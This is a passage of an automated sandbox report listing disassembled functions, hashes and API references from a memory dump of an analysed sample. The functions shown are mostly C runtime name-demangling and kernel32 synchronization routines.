                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38f41b8eaa5fc1b97b17ffe434c3eafa812a18ee46505a336580da0a0c627981
                                      • Instruction ID: 15bd2a5e2294b712e1b4b8248ec22c49e063194cbcabdb99cacb00912b7608e3
                                      • Opcode Fuzzy Hash: 38f41b8eaa5fc1b97b17ffe434c3eafa812a18ee46505a336580da0a0c627981
                                      • Instruction Fuzzy Hash: FD511832D1835E4BCB01DF3D954119AF7D1BFE6208F458B1AECA433212E730B9C89691
                                      Function 009157A7 Relevance: .2, Instructions: 154COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6f78b06b2ed92a8ec2a35baf1f27e181bb1b3a0e4c184117153678194b3bb88
                                      • Instruction ID: 8c4a9dabcdeccf91fe7c8a026caf4ecda5aa1818cf9cc8b4493b716ceaeae0f3
                                      • Opcode Fuzzy Hash: a6f78b06b2ed92a8ec2a35baf1f27e181bb1b3a0e4c184117153678194b3bb88
                                      • Instruction Fuzzy Hash: 5C513172E1C4B814EB1D417E48723FDBEF29BC5202F0E81EAD9A3657D9C53943469B50
                                      Function 009250D0 Relevance: .2, Instructions: 152COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c79aed02ba24220e7920bcc5e9149058131b2e6e47e5b67b50b7964d26267735
                                      • Instruction ID: d431a1a6466e475dbcfc646cfee9a592a23fb4e3919601af6b3302fa720e13f4
                                      • Opcode Fuzzy Hash: c79aed02ba24220e7920bcc5e9149058131b2e6e47e5b67b50b7964d26267735
                                      • Instruction Fuzzy Hash: 1B618F55C18FD846E6038B3D98422E6B3A0BFFA299F18D706FDB436132EB21B6C55350
                                      Function 009157B4 Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fcdcf1dd4996f771314b63a746aa1dff0e1eba8bc615e08403dda3c81b531f8c
                                      • Instruction ID: 8f3e84bb39ca09f34591e24c0e05305bd51cd5dccefcf87ee3d3eeb9efba9039
                                      • Opcode Fuzzy Hash: fcdcf1dd4996f771314b63a746aa1dff0e1eba8bc615e08403dda3c81b531f8c
                                      • Instruction Fuzzy Hash: B3514071D1C4A814EB1D417E48B22FDBEF29BC5202F0E81AAD9A3A66D9C53903469B50
                                      Function 00918C40 Relevance: .1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                      • Instruction ID: da16ce67a9ba66ef1b746e419301d7cd87d58011ccfadcf4d6227e432657d200
                                      • Opcode Fuzzy Hash: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                      • Instruction Fuzzy Hash: D951E131E04B8A8BD711CF3CC6855AAB3A1BFF9348F198759D8846B197EB30B5C99740
                                      Function 008F0880 Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                      • Instruction ID: 9a3afa65e0348d92e76952c53a86dc02d37e0319edf3287e2fbb22d33ba5a2c8
                                      • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                      • Instruction Fuzzy Hash: 344172327215168FD708CF39C895BA5F7E1FB98310F558769E42ACB2C2DB35E9148B84
                                      Function 00924910 Relevance: .1, Instructions: 117COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b109945f239d73b35f1c4d32d2d4060bfd6c877b6ed5f309652db362999435a1
                                      • Instruction ID: a3ea4e296a78cb1d5a8e28658a9c707362b67ac462ffb572b4b0977573ea40f3
                                      • Opcode Fuzzy Hash: b109945f239d73b35f1c4d32d2d4060bfd6c877b6ed5f309652db362999435a1
                                      • Instruction Fuzzy Hash: 3C512275A087018FC325CF28D491A5AB7F4FF9D304B548A2EE49AD7610E730FA45CB85
                                      Function 00925370 Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac79319d675a8eccf4d8ce1f47f29382643508449357e82df7b63a51a45e66a6
                                      • Instruction ID: 5c065bc10cb40a5044e55c5aeb6450d29700b50025c4f440f19bf35d5e49d60e
                                      • Opcode Fuzzy Hash: ac79319d675a8eccf4d8ce1f47f29382643508449357e82df7b63a51a45e66a6
                                      • Instruction Fuzzy Hash: C44172CAC39F9C06E513A73558821C1E190AFFB4DD224E387FC7475672E71275D52220
                                      Function 009597F0 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: 6476dc81b2dfc18aee8b455e40c0d88a2a7e8061b08ebeda6e7e7358389f28a4
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 9D110B77200042C3F618C62FD8B46BA979DEFD7327B2D4279DB454B658D122A54D9700
                                      Function 0095EA8F Relevance: 88.0, APIs: 47, Strings: 3, Instructions: 478COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DName::DName.LIBVCRUNTIME ref: 0095EB05
                                        • Part of subcall function 0095BA28: DName::doPchar.LIBVCRUNTIME ref: 0095BA4F
                                      • DName::operator+.LIBCMT ref: 0095EB14
                                        • Part of subcall function 0095BD6A: DName::operator+=.LIBVCRUNTIME ref: 0095BD80
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE34
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0095EE3D
                                      • DName::operator+.LIBCMT ref: 0095EE4B
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE54
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0095EE5D
                                      • DName::operator+.LIBCMT ref: 0095EE6B
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE74
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0095EE7D
                                      • DName::operator+.LIBCMT ref: 0095EE8B
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE94
                                      • DName::operator+.LIBCMT ref: 0095EEAD
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EEB6
                                      • DName::operator+.LIBCMT ref: 0095EEC3
                                      • UnDecorator::getDataType.LIBVCRUNTIME ref: 0095EED2
                                        • Part of subcall function 0095DC26: DName::DName.LIBVCRUNTIME ref: 0095DC32
                                      • DName::operator+.LIBCMT ref: 0095EEFA
                                      • DName::operator+.LIBCMT ref: 0095EF4C
                                      • DName::operator+=.LIBCMT ref: 0095EEEA
                                        • Part of subcall function 0095BE33: DName::DName.LIBVCRUNTIME ref: 0095BE4D
                                      • DName::operator=.LIBVCRUNTIME ref: 0095EAF2
                                        • Part of subcall function 0095BC61: DName::doPchar.LIBVCRUNTIME ref: 0095BC80
                                      • DName::DName.LIBVCRUNTIME ref: 0095EB56
                                      • DName::operator+.LIBCMT ref: 0095EB62
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EB6E
                                      • DName::operator+=.LIBCMT ref: 0095EB84
                                      • DName::operator+=.LIBCMT ref: 0095EB8E
                                      • UnDecorator::getZName.LIBVCRUNTIME ref: 0095EBC7
                                      • DName::DName.LIBVCRUNTIME ref: 0095EBEF
                                      • DName::operator+.LIBCMT ref: 0095EBFE
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EC1E
                                      • DName::DName.LIBVCRUNTIME ref: 0095EC35
                                      • DName::DName.LIBVCRUNTIME ref: 0095ECAF
                                      • DName::DName.LIBVCRUNTIME ref: 0095ECD4
                                      • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 0095ED14
                                      • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 0095ED54
                                      • DName::operator=.LIBVCRUNTIME ref: 0095EDAF
                                      • DName::operator+.LIBCMT ref: 0095EDC7
                                      • DName::operator=.LIBVCRUNTIME ref: 0095EDF0
                                      • DName::operator=.LIBVCRUNTIME ref: 0095F0A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+Name::operator+=$Name$Name::$Decorator::get$Name::operator=$DimensionSigned$EncodingName::doPcharString$DataType
                                      • String ID: `anonymous namespace'$`string'$operator
                                      • API String ID: 2067090289-815891235
                                      • Opcode ID: 86af73f177adf3d85de26201848d66ce838f9bcb9419ca5cebb056411cd8640a
                                      • Instruction ID: d9b224cd890a72f37c53f596d652457bfa7eb064f160c91d19998626fd8b672c
                                      • Opcode Fuzzy Hash: 86af73f177adf3d85de26201848d66ce838f9bcb9419ca5cebb056411cd8640a
                                      • Instruction Fuzzy Hash: E1021B70804109DFCF18DFAAD8A1AFEBBB8EF49302F14045AF94297192DB759A4DCB50
                                      Function 00960011 Relevance: 65.0, APIs: 31, Strings: 6, Instructions: 265COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • UnDecorator::getDecoratedName.LIBVCRUNTIME ref: 0096007C
                                        • Part of subcall function 0095DCEB: __EH_prolog3.LIBCMT ref: 0095DCF2
                                        • Part of subcall function 0095DCEB: UnDecorator::getDataType.LIBVCRUNTIME ref: 0095DD1F
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0096008A
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00960096
                                      • DName::getString.LIBVCRUNTIME ref: 009600BD
                                      • DName::DName.LIBVCRUNTIME ref: 009600EB
                                      • DName::operator+.LIBCMT ref: 009600FB
                                      • DName::operator+.LIBCMT ref: 0096010A
                                      • DName::DName.LIBVCRUNTIME ref: 00960126
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00960155
                                      • DName::DName.LIBVCRUNTIME ref: 00960169
                                      • DName::DName.LIBVCRUNTIME ref: 00960178
                                      • UnDecorator::getDecoratedName.LIBVCRUNTIME ref: 00960190
                                      • DName::operator+=.LIBVCRUNTIME ref: 0096019A
                                      • DName::operator+=.LIBCMT ref: 009601A4
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 009601C9
                                      • DName::operator+=.LIBVCRUNTIME ref: 009601D3
                                      • DName::operator+=.LIBCMT ref: 009601DD
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 009601E9
                                      • DName::operator+=.LIBVCRUNTIME ref: 009601F3
                                      • DName::operator+=.LIBCMT ref: 009601FD
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00960209
                                      • DName::operator+=.LIBVCRUNTIME ref: 00960213
                                      • DName::operator+.LIBCMT ref: 0096021E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Decorator::get$Name::operator+=$DimensionNameSigned$Name::$Name::operator+$Decorated$DataH_prolog3Name::getStringType
                                      • String ID: .$.$NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                      • API String ID: 3260400872-2556205067
                                      • Opcode ID: e419c889dd26029bf82bfc94fda4604c6e5902c0025f5ebec8be41509882ca0d
                                      • Instruction ID: e4772f2760cf04889ef21dbe53ab9fad4ed2e694fe7eace0ec0bbc2326c7a681
                                      • Opcode Fuzzy Hash: e419c889dd26029bf82bfc94fda4604c6e5902c0025f5ebec8be41509882ca0d
                                      • Instruction Fuzzy Hash: B891CF72D182089BDB24E7B8CCEAFFF7779AF81301F14046AE505A3192DE745A48CB21
                                      Function 0095E4C0 Relevance: 58.9, APIs: 39, Instructions: 351memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DName::DName.LIBVCRUNTIME ref: 0095E570
                                      • DName::operator+.LIBCMT ref: 0095E57F
                                      • UnDecorator::getScope.LIBVCRUNTIME ref: 0095E59E
                                      • DName::DName.LIBVCRUNTIME ref: 0095E5AB
                                      • DName::operator+.LIBCMT ref: 0095E5B7
                                      • DName::operator+.LIBCMT ref: 0095E5C7
                                      • DName::DName.LIBVCRUNTIME ref: 0095E5DB
                                      • DName::operator+.LIBCMT ref: 0095E5EA
                                      • UnDecorator::getThisType.LIBVCRUNTIME ref: 0095E633
                                      • DName::DName.LIBVCRUNTIME ref: 0095E66B
                                      • DName::operator+.LIBCMT ref: 0095E677
                                      • DName::operator+.LIBCMT ref: 0095E687
                                      • UnDecorator::getThisType.LIBVCRUNTIME ref: 0095E699
                                        • Part of subcall function 00960440: UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00960466
                                      • DName::operator|=.LIBCMT ref: 0095E6A3
                                      • DName::DName.LIBVCRUNTIME ref: 0095E6AF
                                      • DName::operator+.LIBCMT ref: 0095E6BD
                                        • Part of subcall function 0095BD6A: DName::operator+=.LIBVCRUNTIME ref: 0095BD80
                                      • DName::operator+.LIBCMT ref: 0095E6F7
                                      • DName::DName.LIBVCRUNTIME ref: 0095E723
                                      • DName::operator+.LIBCMT ref: 0095E732
                                      • DName::operator+.LIBCMT ref: 0095E740
                                      • _HeapManager::getMemory.LIBVCRUNTIME ref: 0095E758
                                      • operator+.LIBVCRUNTIME ref: 0095E88C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+$NameName::$Decorator::get$Type$This$DataHeapIndirectManager::getMemoryName::operator+=Name::operator|=Scopeoperator+
                                      • String ID:
                                      • API String ID: 1537886362-0
                                      • Opcode ID: 85f87e4cd6712847a5fdd8ac9776e3c646ee1c3a216651f28835625b444cac8f
                                      • Instruction ID: 3dbe27d78fcac77cd90f13b4920d8403ada9f2321b758ed063e126092e2359a9
                                      • Opcode Fuzzy Hash: 85f87e4cd6712847a5fdd8ac9776e3c646ee1c3a216651f28835625b444cac8f
                                      • Instruction Fuzzy Hash: 11C186B1D01208AFCB18DFA6D895AEE77B8FF54301F10815AF911A7291EF359A49CB50
                                      Function 00940E23 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 86libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(009D87E8,00000FA0,BA3649C5,?,?,?,?,0098F9B0,000000FF), ref: 00940E52
                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,0098F9B0,000000FF), ref: 00940E5D
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0098F9B0,000000FF), ref: 00940E6E
                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00940E84
                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00940E92
                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00940EA0
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940ECB
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940ED6
                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0098F9B0,000000FF), ref: 00940EF9
                                      • ___scrt_fastfail.LIBCMT ref: 00940F0A
                                      • DeleteCriticalSection.KERNEL32(009D87E8,00000007,?,?,?,?,0098F9B0,000000FF), ref: 00940F15
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0098F9B0,000000FF), ref: 00940F25
                                      Strings
                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00940E58
                                      • SleepConditionVariableCS, xrefs: 00940E8A
                                      • InitializeConditionVariable, xrefs: 00940E7E
                                      • WakeAllConditionVariable, xrefs: 00940E98
                                      • kernel32.dll, xrefs: 00940E69
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AddressHandleProc$CriticalModuleSection__crt_fast_encode_pointer$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 2634751764-1714406822
                                      • Opcode ID: 4c4498615853d0f0ecb97e0c383a0a740e2249639dd43b7429af6b5cba733ec2
                                      • Instruction ID: 903088680c679b7b17d0b84289d35ffe6ce7f3aeed80d759b061d906410e0544
                                      • Opcode Fuzzy Hash: 4c4498615853d0f0ecb97e0c383a0a740e2249639dd43b7429af6b5cba733ec2
                                      • Instruction Fuzzy Hash: E521C432AA9710BBDB215FB8ED09F2B77ECDB85B59F00452AFA01D3291DF748C009660
                                      Function 0095F0DC Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 155COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 0095F113
                                      • DName::operator=.LIBVCRUNTIME ref: 0095F124
                                      • DName::operator+=.LIBCMT ref: 0095F132
                                      • UnDecorator::getPtrRefType.LIBCMT ref: 0095F164
                                      • operator+.LIBVCRUNTIME ref: 0095F185
                                      • UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 0095F1E2
                                      • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 0095F1EB
                                      • UnDecorator::getPtrRefDataType.LIBVCRUNTIME ref: 0095F203
                                      • UnDecorator::getScopedName.LIBVCRUNTIME ref: 0095F23F
                                      • operator+.LIBVCRUNTIME ref: 0095F260
                                      • DName::DName.LIBVCRUNTIME ref: 0095F272
                                      • DName::operator=.LIBVCRUNTIME ref: 0095F29D
                                      • DName::operator+=.LIBCMT ref: 0095F2AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
